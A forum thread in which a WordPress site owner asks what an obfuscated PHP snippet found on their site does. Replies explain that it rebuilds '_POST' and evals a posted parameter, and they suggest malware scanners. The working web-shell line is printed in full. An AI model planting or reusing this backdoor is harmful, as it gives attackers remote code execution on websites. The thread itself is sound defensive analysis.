Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

Register Log in
  • Congratulations IamaSherpa on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

what does this code mean

Status
Not open for further replies.
tyutghf

tyutghf

Technical User
Apr 12, 2008
258
GB
Hi

I found a file in my wordpress website containing this code

Code: 
$wat8= "so_pt" ; $cvn1=strtoupper ( $wat8[2].$wat8[3].$wat8[1]. $wat8[0].$wat8[4]) ;if( isset( ${$cvn1 }[ 'qd6e706' ])){eval( ${ $cvn1 } [ 'qd6e706']) ; }

I have removed it and found a few other files with similar in and removed those, reset all passwords, created new salts. All plugins are up to date, as is the wordpress version, what does this code do?
 
Sort by date Sort by votes
This just sets the variable $wat8 to the value of "so_pt".
Code: 
$wat8= "so_pt" ;

This, simply concatenates each of the characters of $wat8 in a different order and makes them upper case, so $cvn1 ends up having the value of "_POST".
Code: 
 $cvn1=strtoupper ( $wat8[2].$wat8[3].$wat8[1]. $wat8[0].$wat8[4]) ;

This then checks whether a variable named $_POST exists, and contains a key named 'qd6e706', in which case it evaluates it (i.e tries to execute any code inside it).
Code: 
if( isset( ${$cvn1 }[ 'qd6e706' ])){eval( ${ $cvn1 } [ 'qd6e706']) ; }

All together, it looks to be intercepting a value from a posted form, and attempting to run any code that may be inside it.






----------------------------------
Phil AKA Vacunita
----------------------------------
Ignorance is not necessarily Bliss, case in point:
Unknown has caused an Unknown Error on Unknown and must be shutdown to prevent damage to Unknown.

Web & Tech
 
Upvote 0 Downvote
It means your Wordpress installation has been infected with a code injection attack. We have one hosting client that has had the same attack a few days ago.

If you have full server access I suggest installing Maldetect which can scan the server for malicious files.

For wordpress, install All in one Wordpress Security and it will alert you of any files that have been changed, added or removed.
It does a lot more as well of course but we get file system alerts for all our clients with WP installs and can deal with the problem normally before any damage is done.

Chris.

Indifference will be the downfall of mankind, but who cares?
Time flies like an arrow, however, fruit flies like a banana.
Webmaster Forum
 
Upvote 0 Downvote
Status
Not open for further replies.

Similar threads

lflynnlrf
  • Locked
  • Question
wordpress/ shortcode/ PHP duplicating code
Replies
1
Views
157
spamjim
spamjim
chrisjchrisj
  • Locked
  • Question
Can you tell me if this file outputs a subcategory page?
Replies
3
Views
175
spamjim
spamjim
kaeserea
  • Locked
  • Question
Connect to ODBC without pw in Code 1
Replies
2
Views
240
spamjim
spamjim
virtualtom
  • Locked
  • Question
Can ankyone help me extract the data that passes thru this form?
Replies
1
Views
145
spamjim
spamjim
Pudsters
  • Locked
  • Question
Shorten code to loop through array? 1
Replies
4
Views
185
Pudsters
Pudsters

Part and Inventory Search

Sponsor

Back
Top